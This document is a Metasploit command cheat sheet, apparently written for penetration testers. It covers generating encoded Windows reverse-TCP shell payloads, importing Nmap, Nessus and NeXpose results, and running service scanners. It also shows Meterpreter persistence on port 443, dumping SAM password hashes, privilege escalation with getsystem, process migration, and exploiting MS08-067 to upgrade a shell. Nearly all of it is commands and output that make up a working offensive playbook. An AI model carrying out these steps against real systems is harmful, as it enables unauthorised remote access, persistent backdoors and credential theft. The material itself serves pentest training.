Metasploit Framework - Payload Encoding

List all available payloads and search for windows reverse tcp shellsmsfpayload -l | grep windows | grep shell | grep reverse | tcp
List available encoders 
msfencode -l 
Reverse self-contained (not staged) command shell: 341 bytes
msfpayload windows/shell_reverse_tcp LHOST= R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c
Windows Command Shell, reverse Ordinal TCP Stager (Np NX or Win7)

Use msf multi/handler to listen and upload remainder of the shellcode (stage 2)

msfpayload windows/shell/reverse_ord_tcp LHOST= R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c

Generic Syntax

msfpayload <payload> <options> <output>| ./msfencode -e <encoder> -b <bad bytes> -t <output format>

Importing  external scan results into the database

Importing - Nmap scans into the MSF database
msf> db_import /path/filename.xml
(keep in mind externally scanning and importing xml results can be faster than executing nmap within msf (below))
Import - Nessus scans into the MSF database
msf> db_import /path/filename.nessus

Import - NeXpose scans into the MSF database

msf> db_import /path/filename.xml

Running an Nmap scan within MSF to add to the database

msf> db_nmap -sS -A <hosts>
msf> db_nmap -sSV -O -PN --send-ip <hosts>
Running NeXpose from within MSF
msf> load nexpose
msf> nexpose_connect username:password@host[:port]
msf> nexpose_scan

Running Nessus from within MSF

msf> load nessus
msf> nessus_connect username:password@host[:port]
msf> nessus_policy_list
msf> nessus_scan_new
msf> nessus_scan_status
msf> nessus_report_list
msf> nessus_report_get

Retrieving data from the database from within MSF

List of discovered services
msf> db_services
List of discovered hosts
msf> db_hosts
List of discovered hosts with additional columns "address" and "operating system"
msf> db_hosts -c address,os_flavor
List of discovered vulnerabilities (e.g. as imported from vulnerability scanner like nessus)
msf> db_vulns

Retrieving data from the database from within MySQL

 Retrieve hosts and associated services:mysql> select
address,hosts.name,os_name,os_flavor,os_sp,hosts.updated_at,port,proto,services.name,services.info from hosts,services where hosts.id=services.host_id;
Retrieve matching 'pc21-97.*' hosts and associated services:
mysql> select address,hosts.name,os_name,os_flavor,os_sp,hosts.updated_at,port,proto,services.name,services.info from hosts,services where hosts.name LIKE 'pc21-97.%' and hosts.id=services.host_id;
Retrieve matching '*.97' hosts and associated services:
mysql> select address,hosts.name,os_name,os_flavor,os_sp,hosts.updated_at,port,proto,services.name,services.info from hosts,services where hosts.address LIKE '%.97' and hosts.id=services.host_id;

Service Scanners - SSH Server Banner Scanner

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS
msf auxiliary(ssh_version) > set THREADS 20
msf auxiliary(ssh_version) > run
[*] :22, SSH server version: SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1

Service Scanners - MSSQL Scanner

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS
msf auxiliary(mssql_ping) > set THREADS 20
msf auxiliary(mssql_ping) > run
[*] SQL Server information for :
[*] ServerName = V-XPSP2-BARE
[*] InstanceName = SQLEXPRESS
[*] IsClustered = No
[*] Version = 10.0.1600.22
[*] tcp = 1433
Service Scanners - SMB Version Scanner
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS
msf auxiliary(smb_version) > run
[*] is running Windows XP Service Pack 2 (language: English)
(name:HOSTNAME) (domain:WORKGROUP)

Service Scanners -  SNMP login scanner

msf> use auxiliary/scanner/snmp/snmp_login


Meterpreter Scripts - Persistence

meterpreter > run persistence -X -i 50 -p 443 -r
at boot time (-X), interval seconds (-i ), port (-p 443) and reverse (-r )
msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set LHOST
msf exploit(handler) > exploit
[*] Meterpreter session 2 opened (:443 -> :1120)

Metasploit Meterpreter Post Exploitation Modules

Hashdump - The 'hashdump' post module will dump the contents of the SAM database.meterpreter > run post/windows/gather/hashdump or meterpreter > hashdump
Occasionally, the effective process does not have access or permission to retrieve the hashes - even if the meterpreter running as a SYSTEM or ADMINISTRATOR user.
Access can sometimes be achieved by ensuring all permissions are granted to the process, migrating to a process spawned by a SYSTEM user or in the case of x64 systems, making sure that the running process is natively x64 bit (e.g. notepad.exe) and not compatible 32 bit.

<i>meterpreter > </i>hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
List running processes and owners (where visible by the current user)
meterpreter > ps
Get system user if necessary and if possible 
meterpreter > getsystem
Get all missing/available privileges for the current process 
meterpreter > getprivs
Migrate to new process and attempt again  

meterpreter > migrate

Meterpreter Scripts - System Scraper
meterpreter > run scraper

Upgrading command shell to meterpreter shell
msf > use windows/smb/ms08_067_netapi
... ... ...
[*] Command shell session 1 opened (:8080 -> :1032)
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -u 1
... ... ...
[*] Meterpreter session 2 opened (:8080 -> :1044)
msf exploit(ms08_067_netapi) > sessions -i 2


